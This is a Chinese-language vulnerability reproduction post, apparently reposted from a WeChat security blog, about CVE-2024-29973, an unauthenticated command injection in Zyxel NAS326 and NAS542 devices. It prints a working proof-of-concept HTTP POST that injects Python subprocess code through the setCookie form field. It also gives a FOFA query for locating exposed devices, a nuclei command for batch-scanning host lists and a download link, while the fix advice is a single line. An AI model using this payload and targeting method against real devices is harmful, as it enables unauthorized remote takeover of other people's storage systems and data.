漏洞复现-CVE-2024-29973

admin

108797
文章

90
评论

2024年6月30日17:49:05评论16 views字数 1206阅读4分1秒阅读模式

Zyxel NAS设备 setCookie 未授权命令注入漏洞

二：漏洞描述

Zyxel-NAS（Network Attached Storage）是由Zyxel通讯公司旗下网络附加存储设备。NAS设备长期以来我们都在共享文件和数据，提供了数据备份、远程访问、多媒体共享等功能。

Zyxel NAS326 V5.21(AAZF.17)C0之前版本、NAS542 V5.21(ABAG.14)C0之前版本存在操作系统命令注入漏洞，该漏洞源于setCookie参数中存在命令注入漏洞，从而导致未经身份验证的远程攻击者可通过HTTP POST请求来执行某些操作系统 (OS) 命令。

三：漏洞影响版本

Zyxel NAS326 < V5.21(AAZF.17)C0Zyxel NAS542 < V5.21(ABAG.14)C0

四：网络空间测绘查询

FOFA

body="/cmd,/ck6fup6/user_grp_cgi/cgi_modify_userinfo"

漏洞复现-CVE-2024-29973

五：漏洞复现

poc

POST /cmd,/simZysh/register_main/setCookie HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryHHaZAYecVOf5sfa6 ------WebKitFormBoundaryHHaZAYecVOf5sfa6Content-Disposition: form-data; name="c0" storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("id", shell=True)#------WebKitFormBoundaryHHaZAYecVOf5sfa6--

漏洞复现-CVE-2024-29973

PHP 中，传入代码执行或命令执行等危险函数的参数，客户端可控，同时针对该参数没有做过滤或过滤不足，导致代码执行或命令执行。通过远程访问方式传参，就叫做RCE。

六：批量检测

nuclei.exe -t CVE-2024-29973.yaml -l host.txt

七：修复建议

建议更新当前系统或软件至最新版，完成漏洞的修复。

链接：https://pan.baidu.com/s/1L4zlTitL69WsiQWTCe-Wug 提取码：7x1y

原文始发于微信公众号（Adler学安全）：漏洞复现-CVE-2024-29973

左青龙
微信扫一扫

右白虎
微信扫一扫

漏洞复现-CVE-2024-29973

二：漏洞描述

四：网络空间测绘查询

五：漏洞复现

漏洞复现 | 迈普多业务融合网关send_order.cgi远程命令执行漏洞【附poc】

WordPress插件Recall CVE-2024-32709 SQL注入漏洞【附poc】

Ivanti EPM SQL注入漏洞（CVE-2024-29824）

CVE-2024-36837｜CRMEB电商管理系统存在SQL 注入漏洞（POC）

Saltstack需授权路径遍历漏洞 (CVE-2024-22232)

CVE-2024-6387｜OpenSSH远程代码执行漏洞

SSH-RCE（CVE-2024-6387）

【PoC】CVE-2024-0193Linux (CVSS 7.8)内核权限提升漏洞

VMware vCenter Server 关键 RCE 漏洞 (CVE-2024-37079, CVE-2024-37080)

碧海威科技-L7云路由jumper.php存在命令执行漏洞

发表评论